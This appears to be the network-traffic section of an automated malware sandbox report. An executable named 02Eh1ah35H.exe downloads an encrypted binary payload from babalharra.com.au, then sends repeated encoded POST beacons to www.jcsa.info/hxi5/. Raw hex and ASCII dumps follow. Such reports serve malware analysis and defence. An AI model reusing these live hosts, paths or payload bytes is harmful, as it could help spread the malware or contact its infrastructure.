                                                                                                                                                                              Data Raw: 69 53 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 74 6c 78 6b 34 30 52 66 2b 63 6b 4d 77 64 69 76 59 61 35 6a 77 55 48 70 6e 73 4b 33 52 53 62 72 37 64 46 74 74 47 69 37 65 70 36 44 58 6d 6b 37 4c 6b 5a 6a 6e 33 4c 55 70 49 58 69 52 41 38 4f 33 6b 6e 4e 31 65 53 42 66 78 78 6b 2f 34 2b 4f 41 64 75 56 6d 6e 59 73 33 52 7a 65 7a 6f 33 4a 67 46 61 39 57 74 75 6a 56 4d 78 6d 4c 56 73 63 2f 59 58 44 64 2f 57 55 50 41 44 6a 32 6a 47 76 30 6d 72 37 4d 6f 30 42 59 58 6d 2b 54 72 69 2b 61 4a 36 53 46 38 6a 50 4d 33 4d 2b 54 32 59 43 49 50 46 57 47 31 49 58 4b 75 52 63 6f 55 6d 4a 57 4c 6a 44 41 3d 3d
                                                                                                                                                                              Data Ascii: iS=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6SF8jPM3M+T2YCIPFWG1IXKuRcoUmJWLjDA==


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              83192.168.11.2049857208.91.197.3980
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:02:26.203465939 CET766OUTPOST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 69 6d 62 72 5a 31 46 73 73 47 69 75 65 70 36 4c 33 6e 75 6d 62 6b 6f 6a 6d 4b 32 55 70 30 58 69 52 55 38 4f 31 73 6e 4d 43 4b 54 42 50 78 7a 2f 50 34 38 41 67 64 75 56 6d 6e 59 73 33 46 56 65 31 41 33 4a 51 56 61 37 7a 52 74 2f 6c 4d 79 79 62 56 73 4e 76 59 54 44 64 2f 77 55 4d 45 74 6a 30 62 47 76 78 61 72 31 39 6f 31 57 49 57 74 7a 7a 71 2b 7a 5a 59 70 5a 78 63 57 46 50 48 32 36 6a 69 48 44 65 43 66 4c 30 42 73 55 5a 79 6a 59 59 74 4f 4c 55 4b 34 65 4b 64 78 55 78 4d 4f 38 51 48 39 79 59 74 4c 66 69 4f 41 63 72 49 3d
                                                                                                                                                                              Data Ascii: iS=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZyjYYtOLUK4eKdxUxMO8QH9yYtLfiOAcrI=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              84192.168.11.2049858208.91.197.3980
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:02:28.875220060 CET1220OUTPOST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 6a 65 62 71 6f 56 46 73 4c 71 69 6f 75 70 36 46 58 6e 74 6d 62 6b 50 6a 6d 53 79 55 70 34 68 69 54 73 38 4f 51 67 6e 46 54 4b 54 4b 50 78 7a 33 76 34 2f 4f 41 64 42 56 6c 50 63 73 33 56 56 65 31 41 33 4a 57 5a 61 38 6d 74 74 73 31 4d 78 6d 4c 56 4a 63 2f 59 76 44 64 6e 4f 55 4e 77 54 69 41 76 47 76 52 71 72 33 50 77 31 4a 34 57 76 77 7a 71 32 7a 5a 56 78 5a 31 38 77 46 4f 6a 51 36 69 36 48 42 5a 6a 62 61 47 39 37 47 49 58 76 5a 72 51 34 4c 53 61 47 58 37 5a 30 64 7a 63 63 79 41 44 46 7a 35 4a 52 4e 33 48 46 66 75 47 46 37 6f 77 33 47 35 4c 36 65 56 36 70 68 4e 77 45 51 38 41 52 2b 63 78 6c 45 76 4e 77 56 71 47 5a 5a 4d 47 31 53 57 4e 51 33 67 31 61 41 43 55 50 4a 31 59 33 49 7a 67 37 75 55 30 6e 47 78 53 47 74 51 57 43 54 77 69 77 67 51 4d 65 4d 77 41 67 55 6e 32 6b 47 51 69 42 52 65 73 62 46 36 55 66 38 6b 70 45 71 4c 5a 4f 76 78 46 6c 6f 67 54 47 4a 6d 6c 79 5a 4b 69 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0jebqoVFsLqioup6FXntmbkPjmSyUp4hiTs8OQgnFTKTKPxz3v4/OAdBVlPcs3VVe1A3JWZa8mtts1MxmLVJc/YvDdnOUNwTiAvGvRqr3Pw1J4Wvwzq2zZVxZ18wFOjQ6i6HBZjbaG97GIXvZrQ4LSaGX7Z0dzccyADFz5JRN3HFfuGF7ow3G5L6eV6phNwEQ8AR+cxlEvNwVqGZZMG1SWNQ3g1aACUPJ1Y3Izg7uU0nGxSGtQWCTwiwgQMeMwAgUn2kGQiBResbF6Uf8kpEqLZOvxFlogTGJmlyZKikR4kjFv1KCh5Dvd+NCQrpTdjNz3Q/6eJAWYuHzTXWlW4PGGIVlQnRrgBT4g730Ukn4PU0hbOXamx0pOLGDG5fN0MLvYj6jkKgF+87DQouukdhJl4nLpQ2aplx4PZoBue+7fWhIUp/wTthfAyFcQza5J3mzq1KA0z4HYMCrV4N0l6F+YrRONtgMfGzzNlCSmcKjEhx5Yy1qEqqtI0ymbhfcUX81nLLcJgy/fAAxYX+jBLD/oQsSP/ethucWi/2HB+ZELMJ24CxmQbURIQ560Txw/LQw+Y4ojhgUKojIEPmUUA8MGXWkjya2tnu2EmawUWUgmXaJmb88A+4s
                                                                                                                                                                              Jan 11, 2025 04:02:28.875273943 CET3660OUTData Raw: 68 48 7a 54 70 79 41 62 34 67 55 34 4c 53 55 46 42 4b 42 59 2f 65 67 31 71 66 62 46 47 53 35 55 31 32 67 77 51 47 75 45 38 37 52 7a 70 66 52 66 4d 6a 4d 49 66 38 66 50 42 57 52 38 43 56 31 6b 6e 7a 73 5a 57 6c 63 46 41 6d 65 37 32 59 2f 70 30 33
                                                                                                                                                                              Data Ascii: hHzTpyAb4gU4LSUFBKBY/eg1qfbFGS5U12gwQGuE87RzpfRfMjMIf8fPBWR8CV1knzsZWlcFAme72Y/p032z2gWtEzxXRu/PoEha1lfoaZ/KEiQt7A/anbhTvC7Z+q47iaSilYT5lMl2dOFpdyTAnV9Fpd3IVcE+7a2LcsxHqsD5d/E4CVwbh91bF082dbSR1F/ASXcOa/PxbUf6f1FelSIe0qen5NP91VGtGFhv1o/IuEUCn8t
                                                                                                                                                                              Jan 11, 2025 04:02:28.875319958 CET3035OUTData Raw: 72 66 38 6c 41 47 36 64 50 4d 63 67 39 53 74 63 46 58 45 50 39 4a 48 54 61 36 50 32 31 47 64 6a 58 45 51 6e 52 4f 37 32 33 53 6e 63 74 6a 39 72 56 63 4f 78 75 72 6c 30 56 4a 52 53 6d 4f 4c 45 6f 6d 48 49 6f 6e 69 6f 4b 59 79 77 38 4e 31 45 39 58
                                                                                                                                                                              Data Ascii: rf8lAG6dPMcg9StcFXEP9JHTa6P21GdjXEQnRO723Snctj9rVcOxurl0VJRSmOLEomHIonioKYyw8N1E9Xz+hK98L4wDhjvCSoUcQtm3xplzCJQ1qXRFUFTJ5pLqLctgL0Vk0cAfn4eu2DQ4OCL4PTM/3pSsDYhqR7s9Rwwktcpo/UNEfOIdR+Oiei5eGJ9c+jlZSqWwULSR64/IhhSEZlZhAZ0Fdd5lxfPn/fT0kqbDvc3nFdg


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              85192.168.11.2049859208.91.197.3980
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:02:31.549511909 CET484OUTGET /hxi5/?iS=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 04:02:32.209933996 CET988INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:31 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                              Set-Cookie: vsid=910vr4841101513817758; expires=Thu, 10-Jan-2030 03:02:31 GMT; Max-Age=157680000; path=/; domain=www.jcsa.info; HttpOnly
                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_mhIwJkcXmIQtUN9NoTveXz3nUP25ykJtJDMnBBHF8xuiJ6DUqC9fx3NJJ9WyGlEqrzQxfDR2GyaB7ULAoBNGVw==
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Jan 11, 2025 04:02:32.209969997 CET195INData Raw: 61 63 36 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c
                                                                                                                                                                              Data Ascii: ac61<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preco
                                                                                                                                                                              Jan 11, 2025 04:02:32.209992886 CET1220INData Raw: 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e
                                                                                                                                                                              Data Ascii: nnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.c
                                                                                                                                                                              Jan 11, 2025 04:02:32.210113049 CET1220INData Raw: 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 62 5d 2e 6c 29 7d 7d 7d 72 65 74 75 72 6e 20 61 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62
                                                                                                                                                                              Data Ascii: _customlanguages[b].l)}}}return a};window.cmp_getlang=function(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[
                                                                                                                                                                              Jan 11, 2025 04:02:32.210180044 CET1220INData Raw: 22 3b 69 66 28 22 63 6d 70 5f 67 65 74 6c 61 6e 67 22 20 69 6e 20 68 29 7b 6f 3d 68 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 22 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 22 20
                                                                                                                                                                              Data Ascii: ";if("cmp_getlang" in h){o=h.cmp_getlang().toLowerCase();if("cmp_customlanguages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w=
                                                                                                                                                                              Jan 11, 2025 04:02:32.210303068 CET1220INData Raw: 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 29 3a 22 22 29 2b 28 6e 21 3d 22 22 3f 22 26 63 6d 70 61 74 74 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 3a 22 22 29 2b 28 22 63 6d 70 5f 70 61 72 61 6d 73 22 20
                                                                                                                                                                              Data Ascii: codeURIComponent(r):"")+(n!=""?"&cmpatt="+encodeURIComponent(n):"")+("cmp_params" in h?"&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.curr
                                                                                                                                                                              Jan 11, 2025 04:02:32.210474014 CET1220INData Raw: 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 3d 66 75 6e 63 74 69
                                                                                                                                                                              Data Ascii: ){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" i
                                                                                                                                                                              Jan 11, 2025 04:02:32.210515976 CET1220INData Raw: 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d
                                                                                                                                                                              Data Ascii: 0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length
                                                                                                                                                                              Jan 11, 2025 04:02:32.332572937 CET1220INData Raw: 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 3a 5b 30 5d 2c 67 70 70 53 74 72 69 6e
                                                                                                                                                                              Data Ascii: a"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cm
                                                                                                                                                                              Jan 11, 2025 04:02:32.358004093 CET1220INData Raw: 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29
                                                                                                                                                                              Data Ascii: alue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(windo
                                                                                                                                                                              Jan 11, 2025 04:02:32.358047962 CET1220INData Raw: 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c
                                                                                                                                                                              Data Ascii: n window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript"


                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.11.2049757122.201.127.17443312C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-11 02:54:04 UTC181OUTGET /BJuAryIbeCLh111.bin HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                              Host: babalharra.com.au
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2025-01-11 02:54:04 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:54:04 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Last-Modified: Wed, 04 Dec 2024 09:14:22 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 290368
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              2025-01-11 02:54:04 UTC7943INData Raw: 50 53 ad d2 36 87 fd 49 2b 80 8c 10 26 8f 24 c5 b1 ae 25 4b 5c 6d 43 d0 fd 64 45 0f a6 47 48 bc 03 ab 2e b7 6c 7f 75 cc c6 2c 6e 0e 89 e0 b2 34 11 af ff cb 51 f6 9d eb 0d 1a 6a 4f 93 e7 69 56 db 6f e3 d0 6d 18 0c 68 67 c8 34 7e 53 02 b9 3c 67 a0 dd 19 d2 1d 60 68 60 ea 69 81 23 b3 29 9b 5b a0 2f d0 e5 6d f6 77 9f ba 76 c5 96 9f bb 5e 0d 04 69 64 7a 33 1a 4a 97 a7 54 9b 3a ae 42 a8 2e 8b 38 00 97 2a c1 80 d3 41 7f 29 7e ad cb 5f 95 d4 a1 23 9e 5c 4c d9 5d 48 80 2c 37 08 14 2f 93 ae ea 35 3c 04 e3 ee c0 65 45 46 18 d7 07 ff 13 9a 74 1f 7b 8c 97 36 c7 42 45 34 08 f7 ec c3 63 91 35 61 a2 80 89 f4 b7 8f cb 84 42 ac 1e df 85 74 c4 99 4f 4e 8c 8d 72 79 75 d6 aa c9 ac f7 2c 9a 27 08 42 cd 94 be f4 d1 c3 ce 90 62 af 6f 5e 33 fc 65 b7 de f7 9e 43 5a 85 71 ea 3f 78
                                                                                                                                                                              Data Ascii: PS6I+&$%K\mCdEGH.lu,n4QjOiVomhg4~S<g`h`i#)[/mwv^idz3JT:B.8*A)~_#\L]H,7/5<eEFt{6BE4c5aBtONryu,'Bbo^3eCZq?x
                                                                                                                                                                              2025-01-11 02:54:05 UTC8000INData Raw: 4e 15 97 05 57 84 85 87 cb da 78 18 c1 c3 8b 6c a6 32 91 21 48 67 10 97 3e cd 76 25 92 72 9f b0 14 a4 7e 38 41 3b ee 6a f5 90 49 d3 6b 0e fc 5b 88 14 77 f6 3d 8a 80 2e 92 a2 a9 27 ce e5 98 59 d7 ea d8 d3 f7 a6 0a dd cc 17 21 5c 60 c0 e8 70 bd 6d 9d 1a 3b 41 12 c2 63 a1 af 55 d5 80 38 f8 89 55 8e 3d 77 3b c2 2a ca c8 3f 8d f5 98 4f f5 a6 3f 6a 7b 71 18 f1 b8 2f c7 e1 fc 5f db 80 44 11 e2 04 16 50 1d e8 ea f8 b3 ae 44 76 31 d3 84 75 37 78 95 fa f8 24 42 c7 3b cb 09 59 1a 04 0d 94 a5 d4 a2 73 3e c6 0a e4 bd 12 07 ba 08 b7 d1 d4 10 f5 cc 9a 2d f7 af 79 32 2a bf af 39 e0 26 95 41 28 3a 96 e1 ba a9 fe a7 23 07 59 99 fb cc d2 c8 14 92 ab 21 10 73 ce ea a6 23 ec 7e 9d dd 37 e5 16 27 eb f4 f3 a4 4f 08 e8 f0 38 70 e3 12 e6 fe 70 a8 34 52 be 26 18 d6 1f 06 68 63 49
                                                                                                                                                                              Data Ascii: NWxl2!Hg>v%r~8A;jIk[w=.'Y!\`pm;AcU8U=w;*?O?j{q/_DPDv1u7x$B;Ys>-y2*9&A(:#Y!s#~7'O8pp4R&hcI
                                                                                                                                                                              2025-01-11 02:54:05 UTC8000INData Raw: 9c 25 ee 28 36 d9 e5 ff 3b 3c 24 d5 ba 8e bb f2 ac da 45 89 b4 cc 7a 52 1f 2a 34 ed c3 df 29 f0 4c 25 6e ca 07 38 e2 2c 83 76 3d 6b 2a e0 7e dd 46 1b 35 ef f3 83 27 d1 28 49 4e ff 44 e2 b8 a4 46 53 04 20 34 39 2a 23 7d 33 26 b7 9c 5e b3 e5 f7 cc 2c 92 18 af 6c 25 1c 4c ed b6 92 09 76 81 e9 6c 2e 59 82 e8 45 b6 27 7c 48 fa 57 47 37 02 45 96 bc 6f 8c 9d a2 ae 81 3d 98 8a fa a9 fd 4e d4 fe 7f 24 dd 8f 11 98 de cf c3 39 52 2f 72 38 8f 27 e6 4f 43 d9 76 5b 29 32 4e 72 cf 0d 3a 3a 10 bb 7f de aa 5a 02 41 d6 f6 76 83 a3 58 85 a4 b9 ca 83 9b ce 25 ba 46 7d 7c 84 28 60 70 03 c7 6f c3 cc e6 47 23 15 46 c9 55 cb 85 78 60 ba bd 0b 1b 38 5e 96 f6 94 e6 16 ec 93 86 a8 13 ff 78 c0 78 ef 83 10 f7 96 f9 21 6f ba 73 6c cd 94 c3 6d e6 7b 5b 52 38 cc de cd 0c 50 7a 59 36 2d
                                                                                                                                                                              Data Ascii: %(6;<$EzR*4)L%n8,v=k*~F5'(INDFS 49*#}3&^,l%Lvl.YE'|HWG7Eo=N$9R/r8'OCv[)2Nr::ZAvX%F}|(`poG#FUx`8^xx!oslm{[R8PzY6-
                                                                                                                                                                              2025-01-11 02:54:05 UTC8000INData Raw: d2 85 fc 82 3f 6a ae 8b db ac aa 61 c9 17 ed e5 fb 49 b1 0b 0e 5f c7 41 eb f6 c7 ae 61 55 60 20 a6 c6 fc 3d 73 b1 44 90 88 cc 12 a1 b3 4f 2d fd f4 22 35 0a 0f 8d 36 40 c6 c8 99 d9 99 d0 69 3c dd 17 73 7d 93 98 04 1e 47 5e 0e 02 d1 3f bc 11 40 6d 6e 49 61 ee 0f 65 06 ce a5 b3 42 1b ad 1f fc be d4 24 5a 23 0c 10 ee 3e 8f f2 6e 71 ba b0 5d 97 e3 d0 4a 5b 21 b4 7c 7d e4 8c 11 91 bf e2 1b 84 c9 12 68 40 36 e9 6a ae c7 1f d5 96 96 ca 00 2f 0b 95 d3 8c c8 07 3e e9 cc 1d 5f bb 96 81 56 f4 0c 22 2c 0c ae 0d c2 3e 2b a5 2b bb 84 5d 43 2e 53 4d 0f d1 0b 46 c1 5c df e8 a4 38 c6 09 c5 5f c4 9d 75 01 ad b6 87 ab a3 8d 2a 75 9c 9e 54 1b 7c de f2 81 eb 0e e9 33 5b 91 d9 eb f8 6d e5 24 8c cb f1 f5 a5 6d ba 89 64 90 60 92 a8 a9 bf f9 e5 43 6e 7c 38 c9 64 15 c9 33 77 22 e4
                                                                                                                                                                              Data Ascii: ?jaI_AaU` =sDO-"56@i<s}G^?@mnIaeB$Z#>nq]J[!|}h@6j/>_V",>++]C.SMF\8_u*uT|3[m$md`Cn|8d3w"
                                                                                                                                                                              2025-01-11 02:54:05 UTC8000INData Raw: ba cc 88 6c e7 ce a6 45 24 46 22 df 65 97 84 3f 61 4f 1e 9b d8 aa 1f fd 5c cc ce fb 3a 6f 6a 52 59 6e ea c7 6f 1a dc 40 fb f2 fd 20 a6 3d fa 15 bc 9f 97 4d 70 0d 16 14 db e5 97 5e 19 de 7f 17 39 52 2f c0 c0 53 29 e8 9b d6 b6 f2 59 86 de 6c 81 a2 e4 69 a1 98 02 7c a4 ef 9f 43 2e 6f 45 b4 49 74 ad 0b 9f e2 8f 29 3d c3 85 71 78 84 3d c2 31 8a 40 f2 cc 51 43 1d bd b2 fa fd b6 68 80 1e ff 3e 1b 0c 6a b2 a6 3b 0b d2 08 8a 28 e6 50 10 0e 43 b6 fd 2c c1 1b 43 ca fc ff 2b 64 c9 4d 3c 78 a7 cb 16 ff 1b 1b 40 4f bb 79 e5 27 88 23 59 b7 25 5a c6 8d 8a bb a0 86 87 02 c2 9b b6 b6 61 6d d4 36 15 a1 49 53 41 6b c1 b1 5e d1 03 68 75 57 d0 09 1b 21 83 8d 21 10 73 e2 e8 9f ee bf f4 e1 92 18 43 41 7a 7f 7b 70 af 1c 4e 95 62 96 90 8b e7 9b c9 00 ff bc 4b 30 3f 9f ca 35 70 0c
                                                                                                                                                                              Data Ascii: lE$F"e?aO\:ojRYno@ =Mp^9R/S)Yli|C.oEIt)=qx=1@QCh>j;(PC,C+dM<x@Oy'#Y%Zam6ISAk^huW!!sCAz{pNbK0?5p
